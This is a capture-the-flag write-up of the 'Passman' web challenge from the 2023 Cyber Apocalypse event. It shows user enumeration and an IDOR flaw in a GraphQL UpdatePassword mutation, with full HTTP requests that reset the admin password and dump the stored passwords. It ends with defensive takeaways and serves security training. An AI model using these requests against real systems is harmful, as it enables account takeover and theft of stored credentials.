2023 Cyber Apocalypse: Passman

#htb #ctf #web #idor #graphql #authorization

Challenge Information

AttributeDetails
Event2023 Cyber Apocalypse
CategoryWeb
ChallengePassman

Summary

This challenge involves a JavaScript application with a GraphQL API backend that stores passwords. The vulnerability is an IDOR flaw in the UpdatePassword mutation that allows changing any user’s password without proper authorization checks. By exploiting this, an attacker can take over the admin account and access saved passwords including the flag.

Analysis

Vulnerability Identification:

  1. User Enumeration: Attempting to register with the username “admin” returns:

    Error: ER_DUP_ENTRY: Duplicate entry 'admin' for key 'username'

    This reveals the admin user exists.

  2. IDOR in UpdatePassword mutation: The GraphQL mutation endpoint doesn’t properly validate ownership:

    mutation($username: String!, $password: String!) {
      UpdatePassword(username: $username, password: $password) {
        message, token
      }
    }

  3. Missing Authorization Check: The mutation accepts any username but only checks if the request is authenticated (has a valid JWT), not if the JWT owner matches the target username.

Solution

Step 1: Register a test user

Register with username "test" and password "test123"

Step 2: Obtain valid JWT

Login with test/test123 to get a valid JWT token

Step 3: Exploit IDOR to change admin password

Send GraphQL mutation to change admin’s password:

POST /graphql HTTP/1.1
Content-Type: application/json
Cookie: session=<valid_jwt_from_test_user>


{
  "query": "mutation($username: String!, $password: String!) {
    UpdatePassword(username: $username, password: $password) {
      message, token
    }
  }",
  "variables": {
    "username": "admin",
    "password": "newpassword123"
  }
}

Step 4: Login as admin

Login with admin/newpassword123

Step 5: Query saved passwords

POST /graphql HTTP/1.1


{
  "query": "{ getPhraseList { id, owner, type, address, username, password, note } }"
}

This returns all saved passwords including the flag stored in the admin account.

Key Takeaways

  • IDOR vulnerabilities are critical authorization flaws
  • GraphQL endpoints must validate user authorization just like REST APIs
  • Mutations should verify that the authenticated user owns the resource
  • User enumeration helps identify valid targets
  • Chaining vulnerabilities (user enumeration + IDOR) increases impact
  • GraphQL introspection can reveal the full API structure
  • Always implement proper access control on every operation